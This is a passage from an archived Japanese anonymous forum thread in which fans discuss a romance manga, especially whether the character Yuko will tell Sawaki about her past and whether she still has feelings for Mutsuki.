公立の小学校の教師では即座に転勤や転職なんてできないだろうに。
そこまで覚悟しているのかなあって疑問があった。
木綿子の堅実志向の性格から想像すると、ね。

ストーリー設定では、ベッドを共にした直後か後日に、もう打ち明けちゃってる、
という可能性もあるね。
木綿子が沢木とのデートで銀座に出ていて、マリエと偶然会ったときには、
もう、打ち明けちゃった後かも。
やがてまた木綿子の出番があって沢木との関係が話題になったら
「子持ちのバツイチでもいいって言ってくれたからいずれ結婚するつもりよ」
なあんて台詞で済まされるかもね。

64 :花と名無しさん:2007/01/22(月) 08:21:56 ID:???0
>>63
まさに、その銀座で会った時に「言えない」って言ってたよ。
マリエに「言っちゃえばいいのに……だっていつかはわかることでしょ?」と
言われて、「それまででいいの……その時まで付き合えれば……」って答えてる。

まあ、木綿子が告白でもしたら、案外沢木は「知ってた」って答えそうな気は
自分もしている。これ以上木綿子側の展開までぐちゃぐちゃしたら、収拾つかなく
なりそうだもの。

65 :花と名無しさん:2007/01/22(月) 09:13:03 ID:roU8hyOS0
木綿子の話なんてどーでもいい


66 :花と名無しさん:2007/01/22(月) 12:26:50 ID:???O
>64

沢木先生気にしなさそう。
子供も自分の子供みたいに可愛がりそうな。
木綿子はもう睦月には未練なさそう。

67 :花と名無しさん:2007/01/22(月) 13:10:50 ID:???0
木綿子は最初から睦月のことは諦めていて、未練なんかもっていなかったんじゃ?

ただ、2回ほど睦月と親しい時間を持っているね。
一度目は、凪子が宮腰を誘ってホテルに行って、ルームサービスを届けにきた睦月に
見せつけた日の翌朝、「処女を捨ててきた」と部屋に転がり込んできた凪子を休ませておいて
出かけた木綿子がバイト明けの睦月と偶然会って一日付き合った時。睦月の苦しい胸の内を
打ち明けられていた。
二度目は、マリエが入院して家事をやらされていた睦月の陣中見舞いに行ったとき。
2回とも木綿子はそのことを凪子に話していない。「いい女だよな」とか言われて、
結構いい気分になっていたような・・・。

まあ、諦めてはいても「死ぬほど好きだった」らしいけどね。マリエが間違いを
犯したことや、凪子が如月と付き合っているということを知っても、結局マリエや
凪子のことよりも睦月が幸せでなくなることを恐れているのではないかと
いう気もする。

68 :花と名無しさん:2007/01/22(月) 13:58:51 ID:???0
いや〜、最近このスレいつも上のほうにあるね。
定期的にアゲてくださる方がおられるようで。

69 :花と名無しさん:2007/01/22(月) 22:08:00 ID:???O
>67

木綿子といるとホッとするとか睦月言ってたね。

70 :花と名無しさん:2007/01/24(水) 10:46:38 ID:???0
最後木綿子と睦月がくっつけば面白い
(大逆転な展開で)

71 :花と名無しさん:2007/01/24(水) 21:52:50 ID:???0
木綿子に幸せになって欲しい☆

個人的には凪子派ですが。
しがらみが無ければ、凪子&如月の隔たりは年齢だけ?と。

マリエや睦月の意見を無視している
「子供が親よりも先に死ぬことが。。。」
という大里の言葉が一番的を射ていると思います。
世の中、基本がなっていれば何でもアリって感じで。


35 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)